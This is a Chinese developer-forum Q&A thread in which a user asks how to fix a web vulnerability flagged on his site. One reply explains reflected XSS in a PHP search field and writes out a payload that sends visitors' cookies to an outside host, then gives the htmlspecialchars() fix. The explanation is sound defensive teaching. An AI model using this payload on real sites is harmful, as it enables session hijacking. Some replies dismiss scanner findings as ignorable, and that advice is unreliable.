开发者社区> 问答> 正文

web有漏洞这个真心不会修复

                  

    这个看了一下详情,我都不知道怎么修复,才发现用个云这么难

展开
收起
baker668 2013-02-03 14:21:08 8197 0
10 条回答
写回答
取消 提交回答
  • 回8楼lujjjh的帖子
    受教了。
    搞了PHP大半年,没研究过这种跨站漏洞。
    2013-02-04 23:01:56
    赞同 展开评论 打赏
  • 程序有漏洞可以打补丁来完成的吧
    2013-02-04 15:21:47
    赞同 展开评论 打赏
  • Reweb有漏洞这个真心不会修复
    比如你的 search.php 里写着:
    <input type="text" name="keyword" value="<<?php if (isset($_GET["keyword"])) echo $_GET["keyword"]; ?>" />这就会导致跨站漏洞。别人如果传入 keyword 为(为了看清楚,就不进行 URLEncode 了):
    "><script>new Image().src = "http://www.anotherdomain.com/xss.php?cookie="   escape(document.cookie);</script>
    你的网页内容就变成了: <input type="text" name="keyword" value=""><script>new Image().src = "http://www.anotherdomain.com/xss.php?cookie="   escape(document.cookie);</script>" />
    因为提交方式是 GET,所以直接 keyword 直接跟在网址后面即可。这样一来,如果攻击者把这个网址发给别人(或者是嵌入在他的网页里),当你访问他的页面时,你的 Cookie 就自动提交到他的服务器( www.anotherdomain.com)了,漏洞就产生了。

    要修复这个漏洞其实很简单,只要在输出前用 htmlspecialchars() 处理一下即可(PHP 中):
    <input type="text" name="keyword" value="<?php if (isset($_GET["keyword"])) echo htmlspecialchars($_GET["keyword"]); ?>" />
    2013-02-03 23:47:41
    赞同 展开评论 打赏
  • Reweb有漏洞这个真心不会修复
    果断的不管阿里云啥事儿,还是乖乖的看看自己的网站吧
    2013-02-03 22:11:18
    赞同 展开评论 打赏
  • 回5楼mrznz的帖子
    知道了 我果断解决了  

    -------------------------

    回8楼lujjjh的帖子
    嗯 太感谢了
    2013-02-03 19:06:49
    赞同 展开评论 打赏
  • 回 楼主(baker668) 的帖子
    你这个是程序漏洞,跟服务器没关系
    你遮遮掩掩的怎么帮你看

    解决办法
    把你header.php中的搜索模块去掉,使用百度或谷歌站内搜索
    search.php删掉

    2013-02-03 17:26:56
    赞同 展开评论 打赏
  • 这个阿里云没什么关系吧!
    2013-02-03 16:27:11
    赞同 展开评论 打赏
  • 机器检测的漏洞 通常可以无视。
    2013-02-03 15:31:45
    赞同 展开评论 打赏
  • 这个只是阿里云额外的服务,提示的是你用的程序的漏洞。
    可以找程序提供商,也可以不理,一般没啥大问题的。
    2013-02-03 15:30:42
    赞同 展开评论 打赏
  • 程序漏洞跟云有什么关系?
    2013-02-03 14:53:02
    赞同 展开评论 打赏
滑动查看更多
问答分类:
问答地址:
问答排行榜
最热
最新

相关电子书

更多
Web应用系统性能优化 立即下载
高性能Web架构之缓存体系 立即下载
PWA:移动Web的现在与未来 立即下载